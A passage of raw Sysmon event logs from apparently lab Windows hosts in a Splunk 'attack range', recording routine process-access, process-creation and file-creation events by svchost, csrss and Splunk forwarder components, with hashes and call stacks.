11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15FD-6216-E304-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.757{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15FD-6216-E304-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.758{4F8D34B0-15FD-6216-E304-000000003902}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:49.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80A2AEA2608F063759F101C922FB84F8,SHA256=F92FA6E383B80AEA1BE5E170B8F85F5330F4BDD5383ED2E07BBEF3CB7070024E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.526{4F8D34B0-15FD-6216-E204-000000003902}34523080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15FD-6216-E204-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220190Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-15FD-6216-E204-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.257{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15FD-6216-E204-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:49.258{4F8D34B0-15FD-6216-E204-000000003902}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220217Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:50.773{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D749CD93514E1B2E9412AB6D3809091,SHA256=0E11075C61D1E5A3B22B5F012AF5EF1CCE248B176FB115F1B74BC6DB25472837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:50.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A47D2FAA87FF42CD4FF6DBD1520C948,SHA256=C5F965377870249F3547EBCAD583286A58DD6D16D1EEB06CB9AF19295426B6A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220216Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:50.257{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D63D8B8C5DB119596237B65D36D2DC48,SHA256=32D50991B7C3A267F614FFB0C76E5E9B4B715B1C2008BDEB34F41BB17AA4B6F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220215Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:50.009{4F8D34B0-15FD-6216-E304-000000003902}18163416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program 